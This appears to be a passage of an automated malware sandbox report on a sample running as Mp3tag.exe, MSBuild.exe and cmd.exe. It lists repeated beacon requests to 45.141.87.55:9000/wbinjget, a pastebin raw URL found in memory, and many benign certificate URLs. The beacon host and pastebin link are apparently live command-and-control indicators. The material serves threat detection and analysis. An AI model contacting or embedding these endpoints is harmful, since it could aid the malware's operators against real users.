                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficDNS traffic detected: DNS query: time.windows.com
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.141.87.55:9000
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2525529925.0000000002505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.141.87.55:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: Mp3tag.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: Mp3tag.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                            Source: Mp3tag.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: Mp3tag.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: Mp3tag.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                            Source: Mp3tag.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                            Source: Mp3tag.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                            Source: Mp3tag.exeString found in binary or memory: http://musicbrainz.org
                            Source: MSBuild.exe, 0000000E.00000002.2536124574.0000000007542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adob
                            Source: Mp3tag.exeString found in binary or memory: http://ocsp.comodoca.com0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: Mp3tag.exeString found in binary or memory: http://ocsp.sectigo.com0
                            Source: MSBuild.exe, 0000000E.00000002.2536124574.0000000007542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oent
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/d
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/h
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: Mp3tag.exe, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.000000000519C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                            Source: Mp3tag.exeString found in binary or memory: https://api.discogs.com/oauth/access_token
                            Source: Mp3tag.exeString found in binary or memory: https://api.discogs.com/oauth/identity
                            Source: Mp3tag.exeString found in binary or memory: https://api.discogs.com/oauth/identityvwSgWuuGMPKbPEOYNTFNZsDQawYvtlmt?oauth_token=https://api.disco
                            Source: Mp3tag.exeString found in binary or memory: https://api.discogs.com/oauth/request_token
                            Source: Mp3tag.exeString found in binary or memory: https://community.mp3tag.de/
                            Source: Mp3tag.exeString found in binary or memory: https://community.mp3tag.de/pStaticSupport
                            Source: Mp3tag.exeString found in binary or memory: https://community.mp3tag.de/t/export-configuration-archive/1495CMTExportDlg::OnEndlabeleditListnItem
                            Source: Mp3tag.exeString found in binary or memory: https://community.mp3tag.deCMTMainFrame::OnHelpSupportCMTMainFrame::CheckMailAdressCMTMainFrame::Ref
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                            Source: Mp3tag.exeString found in binary or memory: https://docs.mp3tag.de/credits/
                            Source: Mp3tag.exeString found in binary or memory: https://docs.mp3tag.de/credits/Y:
                            Source: Mp3tag.exeString found in binary or memory: https://download.mp3tag.de/versions.xmlCMTUpdater::HandleLatestVersion
                            Source: Mp3tag.exeString found in binary or memory: https://gnudb.org/%s/%s(artistalbum
                            Source: Mp3tag.exeString found in binary or memory: https://gnudb.orgErrorFound
                            Source: MSBuild.exe, 00000014.00000002.2057624072.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/XK7ARdVw
                            Source: MSBuild.exe, 00000014.00000002.2057624072.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/XK7ARdVwPO
                            Source: Mp3tag.exeString found in binary or memory: https://sectigo.com/CPS0
                            Source: Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: Mp3tag.exeString found in binary or memory: https://www.discogs.com/oauth/authorize
                            Source: Mp3tag.exeString found in binary or memory: https://www.mp3tag.de
                            Source: Mp3tag.exeString found in binary or memory: https://www.mp3tag.de/en/donations.html
                            Source: Mp3tag.exeString found in binary or memory: https://www.mp3tag.de/en/donations.htmlpStaticDonate
                            Source: Mp3tag.exeString found in binary or memory: https://www.mp3tag.de/en/privacy.htmlpos
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
